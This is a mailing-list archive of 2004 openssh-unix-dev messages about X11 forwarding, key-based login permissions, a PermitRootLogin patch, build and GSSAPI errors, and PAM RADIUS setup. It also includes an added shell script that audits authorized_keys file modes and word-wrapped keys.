Does OpenSSL's "make test" self-test pass?

--
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
    Good judgement comes with experience. Unfortunately, the experience
    usually comes from bad judgement.

From roland.mainz at nrubsig.org Sun Mar 21 09:20:38 2004
From: roland.mainz at nrubsig.org (Roland Mainz)
Date: Sat, 20 Mar 2004 23:20:38 +0100
Subject: X forwarding and BadWindow error
References: <20040319175432.GD2062@conectiva.com.br> <20040319230335.GA4206@astro.su.se>
Message-ID: <405CC3B6.8EF8F1A4@nrubsig.org>

Sergio Gelato wrote:
>
> * Andreas [2004-03-19 14:54:32 -0300]:
> > Has anybody else experienced weird X11 forwarding problems such
> > as the one below:
>
> Yes. The problem is that OpenSSH 3.8 is trying to pioneer the use of the
> X11 SECURITY extension,

OpenSSH isn't the "pioneer" in this area. I myself wrote the patch to
add support for the SECURITY extension for ssh.com's version of ssh and
other applications exist which make use of the SECURITY extensions (for
example: The "Trusted" versions of Unix).

> which has existed since 1996 but obviously
> not received enough debugging attention so far.

The SECURITY extension is fine so far. Please FIX the toolkits - most of
them (except Motif2) currently don't care about the existence of the
SECURITY extension.

----

Bye,
Roland

--
  __ .  . __
 (o.\ \/ /.o) roland.mainz at nrubsig.org
  \__\/\/__/  MPEG specialist, C&&JAVA&&Sun&&Unix programmer
  /O /==\ O\  TEL +49 2426 901568 FAX +49 2426 901569
 (;O/ \/ \O;)

From bob at proulx.com Mon Mar 22 05:53:15 2004
From: bob at proulx.com (Bob Proulx)
Date: Sun, 21 Mar 2004 11:53:15 -0700
Subject: ssh only with password
In-Reply-To: <200403181536.40609.imhaeuse@physik.uni-wuppertal.de>
References: <200403181536.40609.imhaeuse@physik.uni-wuppertal.de>
Message-ID: <20040321185315.GA28339@misery.proulx.com>

Martin Imhäuser wrote:
> I must relogin on the same machine in my shell with ssh and without password.
> For this I tried the procedure
> ssh-keygen -t dsa and ssh-keygen -t rsa.

Only one of those two is required. Personally I use only the 'rsa'
type.

> I copied the entries in /.ssh/id_dsa.pub and /.ssh/id_rsa.pub in
> /.ssh/authorized_keys

Did you mean a literal / there? Hope not. Those should go into your
home directory, not /. So hopefully you put those in $HOME/.ssh.
Also, the $HOME/.ssh/authorized_keys is on the _remote_ machine and
not the local machine.

Also, sometimes people do this with a text editor and accidentally
word wrap the file. Therefore I recommend simply appending them with
the shell and cat. These steps will correct any problems here.

  mv $HOME/.ssh/authorized_keys $HOME/.ssh/authorized_keys.bak
  cat $HOME/.ssh/id_rsa.pub >> $HOME/.ssh/authorized_keys
  chmod go-w $HOME/.ssh/authorized_keys

> When I open a shell I type exec ssh-agent $SHELL and then ssh-add
> and give my passphrases.

Good.

> When I now type ssh machinename my PC wants my password.

The most common reason for this is that SSH finds insecure file
permission modes on files or directories and therefore cannot trust
the authorized_keys file. You most likely created one of the
directories or files with group write permission. On the remote
machine these commands will verify and correct the permissions.

  ls -ld $HOME $HOME/.ssh $HOME/.ssh/authorized_keys
  drwxr-xr-x 101 bob bob 10824 2004-03-21 11:39 /home/bob
  drwxr-xr-x 3 bob bob 488 2004-01-13 07:54 /home/bob/.ssh
  -rw-r--r-- 1 bob bob 2637 2004-01-09 20:23 /home/bob/.ssh/authorized_keys

If you find one with group write permission change it with chmod.

  chmod go-w $HOME $HOME/.ssh $HOME/.ssh/authorized_keys

That is the most likely problem and those steps should correct it.

Bob

From Stephen.Roylance at verizon.net Mon Mar 22 11:42:27 2004
From: Stephen.Roylance at verizon.net (Stephen Roylance)
Date: Sun, 21 Mar 2004 19:42:27 -0500
Subject: PermitRootLogin issues
Message-ID: <405E3673.9080000@verizon.net>

Hello,

I'm currently experiencing the issue laid out in this thread from last year:
http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=106908815129641&w=2

The discussion that ensued resulted in a number of ideas on how best to
'fix' this issue. The two that seemed most reasonable were:

1. implement a pubkey-only option to PermitRootLogin that would only
   allow root to login using pubkey authentication.
2. implement a more flexible arrangement where a list of allowed
   authentication methods could be passed to PermitRootLogin.

I looked through the code and it seems that both are straightforward to
code, but obviously 1 is much less work. I coded up an implementation of
pubkey-only that works for me, and it's attached. I'm willing to work on
option 2, but since that's quite a bit more work, I'd like some assurance
that that is the _right_ way before I start on it.

I think some solution needs to be merged ASAP. I've seen the
recommendation to use without-password if root logins for scripting must
be allowed in various security docs. With more sites using PAM and
non-typical authentication methods (LDAP, winbind), it can be a nasty
shock (or worse, completely unnoticed) to an administrator when that
option doesn't work as they expect.

-Steve

-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: pubkey-only2.patch
Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040321/43707d51/attachment.ksh
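
Added example (not part of any message in this archive): Bob Proulx's reply above names two reasons key login falls back to a password prompt, group-writable paths and an authorized_keys entry broken by an editor's word wrap. The script below checks for both; the function names, the constructed demo directory and its made-up key are assumptions of this example, and only protocol-2 key types are recognised.

```shell
#!/bin/sh
# Added example: check the three paths from Bob's reply and look for key
# lines broken by word wrap. All names and sample data are constructed.

# insecure_mode PATH: succeed if PATH is writable by group or others.
insecure_mode() {
    # First field of ls -ld is e.g. "drwxrwxr-x": column 6 is group write,
    # column 9 is other write. -L follows a symlinked home or .ssh.
    perm=$(ls -ldL -- "$1" | cut -c1-10)
    case $perm in
        ?????w????|????????w?) return 0 ;;
    esac
    return 1
}

# wrapped_lines FILE: print the number of every line with no key-type field.
# A wrapped key leaves its continuation as bare base64, which cannot start
# with "ssh-" (base64 has no "-"). Assumption: protocol-2 key types only.
wrapped_lines() {
    awk '
        NF == 0 || $1 ~ /^#/ { next }      # skip blank lines and comments
        {
            ok = 0
            for (i = 1; i <= NF; i++)
                if ($i ~ /^(ssh-(rsa|dss|ed25519)|ecdsa-sha2-)/) ok = 1
            if (!ok) print NR
        }' "$1"
}

# audit_ssh_home HOME_DIR: print one finding per line; succeed only if clean.
audit_ssh_home() {
    home=$1
    keys=$home/.ssh/authorized_keys
    findings=0
    for p in "$home" "$home/.ssh" "$keys"; do
        if [ ! -e "$p" ]; then
            echo "MISSING  $p"
            findings=$((findings + 1))
        elif insecure_mode "$p"; then
            echo "WRITABLE $p (fix: chmod go-w)"
            findings=$((findings + 1))
        fi
    done
    if [ -f "$keys" ]; then
        for n in $(wrapped_lines "$keys"); do
            echo "WRAPPED  $keys line $n"
            findings=$((findings + 1))
        done
    fi
    [ "$findings" -eq 0 ]
}

# Constructed demo: a throwaway home with a group-writable .ssh and a key
# that an editor wrapped onto a second line (the key material is made up).
demo() {
    d=$(mktemp -d)
    mkdir "$d/.ssh"
    chmod 755 "$d"
    chmod 775 "$d/.ssh"
    printf '%s\n' '# constructed sample' \
        'ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA' \
        'x9Zk3fQ2 user@example' > "$d/.ssh/authorized_keys"
    chmod 644 "$d/.ssh/authorized_keys"
    rc=0
    audit_ssh_home "$d" || rc=$?
    rm -rf "$d"
    return "$rc"
}

# Stand-alone use: sh audit.sh "$HOME" on the machine being logged in to.
if [ $# -gt 0 ]; then
    audit_ssh_home "$1"
fi
```

Run it on the remote machine against the account's home directory; a silent exit status of 0 means neither problem was found.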
From andreas at conectiva.com.br Tue Mar 23 03:40:30 2004
From: andreas at conectiva.com.br (Andreas)
Date: Mon, 22 Mar 2004 13:40:30 -0300
Subject: X forwarding and BadWindow error
In-Reply-To: <405B7D4F.6090807@mindrot.org>
References: <20040319175432.GD2062@conectiva.com.br> <405B7D4F.6090807@mindrot.org>
Message-ID: <20040322164030.GB32554@conectiva.com.br>

On Sat, Mar 20, 2004 at 10:07:59AM +1100, Damien Miller wrote:
> to limit access to the client's X server. You can disable this using the
> ForwardX11Trusted option or you can adjust the server's policy

This option should probably be included in the sshd_config(5) manpage.

From andreas at conectiva.com.br Tue Mar 23 03:43:17 2004
From: andreas at conectiva.com.br (Andreas)
Date: Mon, 22 Mar 2004 13:43:17 -0300
Subject: X forwarding and BadWindow error
In-Reply-To: <405B7D4F.6090807@mindrot.org>
References: <20040319175432.GD2062@conectiva.com.br> <405B7D4F.6090807@mindrot.org>
Message-ID: <20040322164317.GC32554@conectiva.com.br>

On Sat, Mar 20, 2004 at 10:07:59AM +1100, Damien Miller wrote:
> As of OpenSSH 3.8, X forwarding by default uses the XSECURITY extension
> to limit access to the client's X server. You can disable this using the
> ForwardX11Trusted option or you can adjust the server's policy

Ups, my apologies, it *is* included in the manpage.

From markus at openbsd.org Tue Mar 23 03:45:47 2004
From: markus at openbsd.org (Markus Friedl)
Date: Mon, 22 Mar 2004 17:45:47 +0100
Subject: X forwarding and BadWindow error
In-Reply-To: <20040322164030.GB32554@conectiva.com.br>
References: <20040319175432.GD2062@conectiva.com.br> <405B7D4F.6090807@mindrot.org> <20040322164030.GB32554@conectiva.com.br>
Message-ID: <20040322164547.GA26219@folly>

On Mon, Mar 22, 2004 at 01:40:30PM -0300, Andreas wrote:
> On Sat, Mar 20, 2004 at 10:07:59AM +1100, Damien Miller wrote:
> > to limit access to the client's X server. You can disable this using the
> > ForwardX11Trusted option or you can adjust the server's policy
>
> This option should probably be included in the sshd_config(5) manpage.
>

but it's a client option....

From andreas at conectiva.com.br Tue Mar 23 03:47:37 2004
From: andreas at conectiva.com.br (Andreas) Date: Mon, 22 Mar 2004 13:47:37 -0300 Subject: X forwarding and BadWindow error In-Reply-To: <20040322164547.GA26219@folly> References: <20040319175432.GD2062@conectiva.com.br> <405B7D4F.6090807@mindrot.org> <20040322164030.GB32554@conectiva.com.br> <20040322164547.GA26219@folly> Message-ID: <20040322164737.GD32554@conectiva.com.br> On Mon, Mar 22, 2004 at 05:45:47PM +0100, Markus Friedl wrote: > > This option should probably be included in the sshd_config(5) manpage. > > > > but it's a client option.... Yes, I was wrong, see my next email :)
From agiri at sj.symbol.com Tue Mar 23 13:18:43 2004
From: agiri at sj.symbol.com (Amba giri)
Date: Mon, 22 Mar 2004 18:18:43 -0800
Subject: A question on Compilation errors...
Message-ID:

Hello

I am attempting to build on a LynxOS platform and am using an old version of zlib and OpenSSL-0.9.6a. I get past the configure stage by ignoring the zlib version check. However, at make stage I run into the following undefineds. Any idea what may be causing this? I am using version 3.8p1 of OpenSSH.

Thank you in advance for your response
Amba

(cd openbsd-compat && make)
make[1]: Nothing to be done for `all'.
gcc -o ssh ssh.o readconf.o clientloop.o sshtty.o sshconnect.o sshconnect1.o sshconnect2.o -L. -Lopenbsd-compat/ -L/usr/local/ssl/lib -lssh -lopenbsd-compat -lcrypto -lz
collect2: ld returned 1 exit status
readconf.o: In function `parse_token':
/openssh-3.8p1/readconf.c(263): undefined reference to `strcasecmp'
readconf.o: In function `process_config_line':
/openssh-3.8p1/readconf.c(723): undefined reference to `strcasecmp'
/openssh-3.8p1/readconf.c(725): undefined reference to `strcasecmp'
/openssh-3.8p1/readconf.c(727): undefined reference to `strcasecmp'
sshconnect.o: In function `timeout_connect':
/openssh-3.8p1/sshconnect.c(243): undefined reference to `howmany'
sshconnect.o: In function `ssh_connect':
/openssh-3.8p1/sshconnect.c(330): undefined reference to `getservbyname'
sshconnect.o: In function `confirm':
/openssh-3.8p1/sshconnect.c(545): undefined reference to `strncasecmp'
/openssh-3.8p1/sshconnect.c(549): undefined reference to `strncasecmp'
./libssh.a(log.o): In function `log_facility_number':
/openssh-3.8p1/log.c(101): undefined reference to `strcasecmp'
./libssh.a(log.o): In function `log_level_number':
/openssh-3.8p1/log.c(113): undefined reference to `strcasecmp'
./libssh.a(log.o): In function `do_log':
/openssh-3.8p1/log.c(329): undefined reference to `openlog'
/openssh-3.8p1/log.c(330): undefined reference to `syslog'
/openssh-3.8p1/log.c(331): undefined reference to `closelog'
./libssh.a(cipher.o): In function `cipher_by_name':
/openssh-3.8p1/cipher.c(149): undefined reference to `strcasecmp'
./libssh.a(channels.o): In function `channel_prepare_select':
/openssh-3.8p1/channels.c(1668): undefined reference to `howmany'
./libssh.a(packet.o): In function `packet_read_seqnr':
/openssh-3.8p1/packet.c(833): undefined reference to `howmany'
/openssh-3.8p1/packet.c(858): undefined reference to `howmany'
./libssh.a(packet.o): In function `packet_write_wait':
/openssh-3.8p1/packet.c(1371): undefined reference to `howmany'
/openssh-3.8p1/packet.c(1375): undefined reference to `howmany'
./libssh.a(canohost.o): In function `check_ip_options':
/openssh-3.8p1/canohost.c(150): undefined reference to `getprotobyname'
openbsd-compat//libopenbsd-compat.a(fake-rfc2553.o): In function `ssh_getnameinfo':
/openssh-3.8p1/openbsd-compat/fake-rfc2553.c(64): undefined reference to `gethostbyaddr'
openbsd-compat//libopenbsd-compat.a(fake-rfc2553.o): In function `ssh_getaddrinfo':
/openssh-3.8p1/openbsd-compat/fake-rfc2553.c(164): undefined reference to `getservbyname'
/openssh-3.8p1/openbsd-compat/fake-rfc2553.c(198): undefined reference to `gethostbyname'
openbsd-compat//libopenbsd-compat.a(getrrsetbyname.o): In function `getrrsetbyname':
/openssh-3.8p1/openbsd-compat/getrrsetbyname.c(190): undefined reference to `_res'
/openssh-3.8p1/openbsd-compat/getrrsetbyname.c(190): undefined reference to `res_init'
/openssh-3.8p1/openbsd-compat/getrrsetbyname.c(206): undefined reference to `res_query'
/openssh-3.8p1/openbsd-compat/getrrsetbyname.c(209): undefined reference to `_h_errno'
openbsd-compat//libopenbsd-compat.a(getrrsetbyname.o): In function `parse_dns_qsection':
/openssh-3.8p1/openbsd-compat/getrrsetbyname.c(436): undefined reference to `dn_expand'
openbsd-compat//libopenbsd-compat.a(getrrsetbyname.o): In function `parse_dns_rrsection':
/openssh-3.8p1/openbsd-compat/getrrsetbyname.c(482): undefined reference to `dn_expand'
collect2: ld returned 1 exit status
make: *** [ssh] Error 1
WS5000#

Amba Giri
Symbol Technologies, San Jose
P: 408-528-2721
E:agiri at sj.symbol.com
Symbol. The Enterprise Mobility Company.

From mark at mcs.vuw.ac.nz Tue Mar 23 16:22:56 2004
From: mark at mcs.vuw.ac.nz (Mark Davies)
Date: Tue, 23 Mar 2004 17:22:56 +1200
Subject: gssapi, alpha's, OpenSSH 3.8p1 failing
Message-ID: <200403231722.56628.mark@mcs.vuw.ac.nz>

I have OpenSSH 3.8p1 built and working with GSSAPI based authentication on NetBSD/i386-current and Solaris 9 but then when I try it on both NetBSD/alpha-1.6.2 and Tru64-V5.1 I get:

city-art% ssh -v embassy
OpenSSH_3.8p1, SSH protocols 1.5/2.0, OpenSSL 0.9.7c 30 Sep 2003
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Connecting to embassy [130.195.6.15] port 22.
debug1: Connection established.
debug1: read PEM private key done: type DSA
debug1: read PEM private key done: type RSA
debug1: identity file /u/staff/mark/.ssh/identity type 0
debug1: identity file /u/staff/mark/.ssh/id_rsa type 1
debug1: identity file /u/staff/mark/.ssh/id_dsa type -1
debug1: Remote protocol version 1.99, remote software version OpenSSH_3.8p1
debug1: match: OpenSSH_3.8p1 pat OpenSSH*
debug1: Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-2.0-OpenSSH_3.8p1
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: server->client aes128-cbc hmac-md5 none
debug1: kex: client->server aes128-cbc hmac-md5 none
debug1: SSH2_MSG_KEX_DH_GEX_REQUEST(1024<1024<8192) sent
debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP
debug1: SSH2_MSG_KEX_DH_GEX_INIT sent
debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY
debug1: Host 'embassy' is known and matches the RSA host key.
debug1: Found key in /etc/ssh/ssh_known_hosts:73
debug1: ssh_rsa_verify: signature correct
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug1: SSH2_MSG_NEWKEYS received
debug1: SSH2_MSG_SERVICE_REQUEST sent
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: publickey,gssapi-with-mic,password,hostbased
debug1: Next authentication method: gssapi-with-mic
Connection closed by 130.195.6.15

and the server end reports:

embassy sshd[312937]: fatal: Couldn't convert client name

In the Tru64 case OpenSSH is built against Heimdal 0.5.1 and in the NetBSD/alpha case it's built against the in tree version which I think is a similar vintage. The working NetBSD/i386 and Solaris versions are built against newer Heimdal releases.

So can anyone suggest if this is an OpenSSH bug (alpha 64bit issue?) or a problem with the older Heimdal? And how can I fix this?

cheers
mark

From dtucker at zip.com.au Tue Mar 23 16:46:09 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Tue, 23 Mar 2004 16:46:09 +1100
Subject: A question on Compilation errors...
In-Reply-To:
References:
Message-ID: <405FCF21.9070107@zip.com.au>

Amba giri wrote:
> I am attempting to build on a LynxOS platform and am using a old
> version of zlib and OpenSSL-0.9.6a. I get past the configure stage by
> ignoring the zlib version check. However, at make stage I run into the
> following undefineds. Any idea what may be causing this. I am using
> version 3.8p1 of OpenSSH.

Any reason you don't use newer zlib and openssl? You'll probably save yourself problems down the line.

[...]
> (cd openbsd-compat && make)
> make[1]: Nothing to be done for `all'.
> gcc -o ssh ssh.o readconf.o clientloop.o sshtty.o sshconnect.o
> sshconnect1.o sshconnect2.o -L.
> -Lopenbsd-compat/ -L/usr/local/ssl/lib -lssh -lopenbsd-compat
> -lcrypto -lz
> collect2: ld returned 1 exit status
> readconf.o: In function `parse_token':
> /openssh-3.8p1/readconf.c(263): undefined reference to `strcasecmp'
[...]

That is usually in libc. If your libc doesn't have it, you could probably borrow an implementation from OpenBSD's libc.

> /openssh-3.8p1/sshconnect.c(243): undefined reference to `howmany'

This is a macro defined in defines.h if MISSING_HOWMANY is defined. Try adding "#define MISSING_HOWMANY 1" to config.h.

> ./libssh.a(log.o): In function `do_log':
> /openssh-3.8p1/log.c(329): undefined reference to `openlog'
> /openssh-3.8p1/log.c(330): undefined reference to `syslog'
> /openssh-3.8p1/log.c(331): undefined reference to `closelog'

No idea where you'd find this if it's not in libc. Check the OS documentation.

[...]
> /openssh-3.8p1/openbsd-compat/fake-rfc2553.c(164): undefined reference
> to `getservbyname'
[..]

These are normally in libresolv. Try adding "-lresolv" to LDFLAGS.

I suggest you add a *-lynxos) section to configure.ac with the required bits.

-- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From dtucker at zip.com.au Tue Mar 23 16:55:58 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Tue, 23 Mar 2004 16:55:58 +1100 Subject: gssapi, alpha's, OpenSSH 3.8p1 failing In-Reply-To: <200403231722.56628.mark@mcs.vuw.ac.nz> References: <200403231722.56628.mark@mcs.vuw.ac.nz> Message-ID: <405FD16E.40003@zip.com.au> Mark Davies wrote: > I have OpenSSH 3.8p1 built and working with GSSAPI based authentication on > NetBSD/i386-current and Solaris 9 but then when I try it on both > NetBSD/alpha-1.6.2 and Tru64-V5.1 I get: > > city-art% ssh -v embassy > OpenSSH_3.8p1, SSH protocols 1.5/2.0, OpenSSL 0.9.7c 30 Sep 2003 [snip] > embassy sshd[312937]: fatal: Couldn't convert client name The entire server-side debugging (ie "sshd -ddd") would probably help too. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From mark at mcs.vuw.ac.nz Tue Mar 23 20:24:25 2004 
From: mark at mcs.vuw.ac.nz (Mark Davies) Date: Tue, 23 Mar 2004 21:24:25 +1200 Subject: gssapi, alpha's, OpenSSH 3.8p1 failing In-Reply-To: <405FD16E.40003@zip.com.au> References: <200403231722.56628.mark@mcs.vuw.ac.nz> <405FD16E.40003@zip.com.au> Message-ID: <200403232124.26141.mark@mcs.vuw.ac.nz> On Tuesday 23 March 2004 17:55, Darren Tucker wrote: > The entire server-side debugging (ie "sshd -ddd") would probably help too. OK, here it is: [...] debug1: userauth-request for user mark service ssh-connection method none debug1: attempt 0 failures 0 debug2: input_userauth_request: setting up authctxt for mark debug2: input_userauth_request: try method none Failed none for mark from 130.195.5.12 port 57640 ssh2 debug1: userauth-request for user mark service ssh-connection method gssapi-with-mic debug1: attempt 1 failures 1 debug2: input_userauth_request: try method gssapi-with-mic Postponed gssapi-with-mic for mark from 130.195.5.12 port 57640 ssh2 debug1: Got no client credentials Couldn't convert client name debug1: do_cleanup cheers mark From gert at greenie.muc.de Tue Mar 23 22:57:41 2004 From: gert at greenie.muc.de (Gert Doering) Date: Tue, 23 Mar 2004 12:57:41 +0100 Subject: ssh only with password In-Reply-To: <20040321185315.GA28339@misery.proulx.com>; from bob@proulx.com on Sun, Mar 21, 2004 at 11:53:15AM -0700 References: <200403181536.40609.imhaeuse@physik.uni-wuppertal.de> <20040321185315.GA28339@misery.proulx.com> Message-ID: <20040323125741.G29714@greenie.muc.de> Hi, On Sun, Mar 21, 2004 at 11:53:15AM -0700, Bob Proulx wrote: > > Also, sometimes people do this with an text editor and accidentally > word wrap the file. Therefore I recommend simply appending them with > the shell and cat. These steps will correct any problems here. > > mv $HOME/.ssh/authorized_keys $HOME/.ssh/authorized_keys.bak make that a "cp"... gert -- USENET is *not* the non-clickable part of WWW! //www.muc.de/~gert/ Gert Doering - Munich, Germany gert at greenie.muc.de fax: +49-89-35655025 gert at net.informatik.tu-muenchen.de From Paul.Abel at ditg.tv Wed Mar 24 03:18:59 2004 
From: Paul.Abel at ditg.tv (Paul Abel)
Date: Tue, 23 Mar 2004 16:18:59 -0000
Subject: OpenSSH and pam_radius_auth.so
Message-ID: <945D56628248B64AA347DA4BB22C987702B3C6@ditg-ex01.ditg.co.uk>

Hi,

I have recently upgraded from OpenSSH-3.5 to OpenSSH-3.8 on my Red Hat 6.2 servers. I use radius (pam_radius_auth) for ssh authentication. Since the upgrade ssh1 (putty 0.52) logins are failing. I've come to the conclusion that pam is skipping the radius section of the config file and is falling back to standard unix authentication.

Is there any way of making ssh1 work with radius on recent versions of OpenSSH?

Here is my pam config file:

#%PAM-1.0
auth       sufficient   /lib/security/pam_radius_auth.so debug
auth       required     /lib/security/pam_pwdb.so shadow nodelay
auth       required     /lib/security/pam_nologin.so
account    sufficient   /lib/security/pam_radius_auth.so
account    required     /lib/security/pam_pwdb.so
password   sufficient   /lib/security/pam_radius_auth.so
password   required     /lib/security/pam_pwdb.so shadow nullok use_authtok
session    required     /lib/security/pam_pwdb.so
session    required     /lib/security/pam_limits.so

Thanks,
Paul Abel

This E-mail message, including any attachments, is intended only for the person or entity to which it is addressed, and may contain confidential information. If you are not the intended recipient, any review, retransmission, disclosure, copying, modification or other use of this E-mail message or attachments is strictly forbidden. If you have received this E-mail message in error, please contact the author and delete the message and any attachments from your computer. You are also advised that the views and opinions expressed in this E-mail message and any attachments are the author's own, and may not reflect the views and opinions of Digital Interactive Television Group.

From bob at proulx.com Wed Mar 24 05:41:03 2004
From: bob at proulx.com (Bob Proulx)
Date: Tue, 23 Mar 2004 11:41:03 -0700
Subject: ssh only with password
In-Reply-To: <20040323125741.G29714@greenie.muc.de>
References: <200403181536.40609.imhaeuse@physik.uni-wuppertal.de> <20040321185315.GA28339@misery.proulx.com> <20040323125741.G29714@greenie.muc.de>
Message-ID: <20040323184103.GA7928@misery.proulx.com>

Gert Doering wrote:
> Bob Proulx wrote:
> > Also, sometimes people do this with a text editor and accidentally
> > word wrap the file. Therefore I recommend simply appending them with
> > the shell and cat. These steps will correct any problems here.
> >
> > mv $HOME/.ssh/authorized_keys $HOME/.ssh/authorized_keys.bak
>
> make that a "cp"...

Negative. Using 'cp' would not correct the problem with the original file. It would still be word wrapped. So 'mv' is better if you are trying to start again clean.

Bob

From gert at greenie.muc.de Wed Mar 24 08:25:04 2004
From: gert at greenie.muc.de (Gert Doering)
Date: Tue, 23 Mar 2004 22:25:04 +0100
Subject: ssh only with password
In-Reply-To: <20040323184103.GA7928@misery.proulx.com>; from bob@proulx.com on Tue, Mar 23, 2004 at 11:41:03AM -0700
References: <200403181536.40609.imhaeuse@physik.uni-wuppertal.de> <20040321185315.GA28339@misery.proulx.com> <20040323125741.G29714@greenie.muc.de> <20040323184103.GA7928@misery.proulx.com>
Message-ID: <20040323222504.N29714@greenie.muc.de>

Hi,

On Tue, Mar 23, 2004 at 11:41:03AM -0700, Bob Proulx wrote:
> > > Also, sometimes people do this with a text editor and accidentally
> > > word wrap the file. Therefore I recommend simply appending them with
> > > the shell and cat. These steps will correct any problems here.
> > >
> > > mv $HOME/.ssh/authorized_keys $HOME/.ssh/authorized_keys.bak
> >
> > make that a "cp"...
>
> Negative. Using 'cp' would not correct the problem with the original
> file. It would still be word wrapped. So 'mv' is better if you are
> trying to start again clean.

Well, I agree on that. Even so, your example isn't really consistent in itself - the next line uses "cat $singlefile >>authorized_keys" - so you'll have only *one* key in there, and the ">>" is no different from ">".

That's why I assumed you meant "append new key to the end, but save the file in any case".

gert
--
USENET is *not* the non-clickable part of WWW! //www.muc.de/~gert/
Gert Doering - Munich, Germany gert at greenie.muc.de
fax: +49-89-35655025 gert at net.informatik.tu-muenchen.de

From Tom.V.Phan at saint-gobain.com Wed Mar 24 08:26:17 2004
From: Tom.V.Phan at saint-gobain.com (Phan, Tom V.) Date: Tue, 23 Mar 2004 13:26:17 -0800 Subject: Which file to use? Message-ID: <3BAA66E286E852419355A4FE6917844703209DC8@COI-3> To Whom It May Concern: We see three files, openssh-3.8pq.tar.ga, openssh-3.8p1.tar.gz.sig, and openssh-3.8p1-vs-openbsd.diff.gz Do we need one of these or a different file to load? Currently, we're running SCO UnixWare 7.1.1, and could upgrade to 7.1.3. Thanks for your help. -Tom Phan From agiri at sj.symbol.com Wed Mar 24 08:34:28 2004 
From: agiri at sj.symbol.com (Amba giri)
Date: Tue, 23 Mar 2004 13:34:28 -0800
Subject: A question on Compilation errors...
Message-ID:

Darren

Thank you very much for your response. Yes- I will be upgrading to zlib 1.1.4. I have succeeded in completing a successful build of ssh and sshd on lynxos. Many thanks to you. I do have 2 further questions:

1. After configure and the first run of make-- I notice that the make just hangs after displaying the following:

if test ! -2 "yes"; then \
/usr/bin/perl ./fixpage ssh_prng_cmds; \
fi

--- I then do a ^Z and a second invocation of make causes everything to build and compile. What is causing this?

2. If I attempt to execute ssh and connect to my local IP address, I get the error:

Couldn't exec /usr/local/libexec/ssh-rand-helper.

This file does not exist on my system and I am wondering how it gets built.

Thank you for the 3rd time :)
Amba

Amba Giri
Symbol Technologies, San Jose
P: 408-528-2721
E:agiri at sj.symbol.com
Symbol. The Enterprise Mobility Company.

From chris at obelix.hedonism.cx Wed Mar 24 09:03:47 2004
From: chris at obelix.hedonism.cx (Christian Vogel) Date: Tue, 23 Mar 2004 23:03:47 +0100 Subject: OpenSSH and pam_radius_auth.so In-Reply-To: <945D56628248B64AA347DA4BB22C987702B3C6@ditg-ex01.ditg.co.uk>; from Paul.Abel@ditg.tv on Tue, Mar 23, 2004 at 04:18:59PM -0000 References: <945D56628248B64AA347DA4BB22C987702B3C6@ditg-ex01.ditg.co.uk> Message-ID: <20040323230347.A7395@obelix.frop.org> Hi Paul, On Tue, Mar 23, 2004 at 04:18:59PM -0000, Paul Abel wrote: > Since the upgrade ssh1 (putty 0.52) logins are failing. I've come to > the conclusion that pam is skipping the radius section of the config > file and is falling back to standard unix authentication. have you compiled openssh using --with-pam? Is there any sign of pam being used in /var/log/*? > This E-mail message, including any attachments, is intended only blah.. blah... blah... Chris -- Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning. -- Rich Cook From djm at mindrot.org Wed Mar 24 10:35:49 2004 
From: djm at mindrot.org (Damien Miller)
Date: Wed, 24 Mar 2004 10:35:49 +1100
Subject: OpenSSH and pam_radius_auth.so
In-Reply-To: <945D56628248B64AA347DA4BB22C987702B3C6@ditg-ex01.ditg.co.uk>
References: <945D56628248B64AA347DA4BB22C987702B3C6@ditg-ex01.ditg.co.uk>
Message-ID: <4060C9D5.9040802@mindrot.org>

Paul Abel wrote:
> Hi,
>
> I have recently upgraded from OpenSSH-3.5 to OpenSSH-3.8 on my Red Hat 6.2 servers. I use radius (pam_radius_auth) for ssh authentication. Since the upgrade ssh1 (putty 0.52) logins are failing. I've come to the conclusion that pam is skipping the radius section of the config file and is falling back to standard unix authentication.
>
> Is there any way of making ssh1 work with radius on recent versions of OpenSSH?

Have you turned on "TIS" authentication in PuTTY? IIRC it is off by default.

-d

From djm at mindrot.org Wed Mar 24 10:38:15 2004
From: djm at mindrot.org (Damien Miller)
Date: Wed, 24 Mar 2004 10:38:15 +1100
Subject: Which file to use?
In-Reply-To: <3BAA66E286E852419355A4FE6917844703209DC8@COI-3>
References: <3BAA66E286E852419355A4FE6917844703209DC8@COI-3>
Message-ID: <4060CA67.3050909@mindrot.org>

Take your pick:

openssh-3.8p1.tar.gz - The actual source code distribution
openssh-3.8p1.tar.gz.sig - An OpenPGP signature of the above
openssh-3.8p1-vs-openbsd.diff.gz - The changes relative to OpenBSD

Phan, Tom V. wrote:
> To Whom It May Concern:
>
> We see three files, openssh-3.8pq.tar.ga, openssh-3.8p1.tar.gz.sig, and
> openssh-3.8p1-vs-openbsd.diff.gz
> Do we need one of these or a different file to load? Currently, we're
> running SCO UnixWare 7.1.1, and could upgrade to 7.1.3.
> Thanks for your help.
> -Tom Phan
>
> _______________________________________________
> openssh-unix-dev mailing list
> openssh-unix-dev at mindrot.org
> http://www.mindrot.org/mailman/listinfo/openssh-unix-dev

From mhaverkamp at kcp.com Wed Mar 24 03:56:49 2004
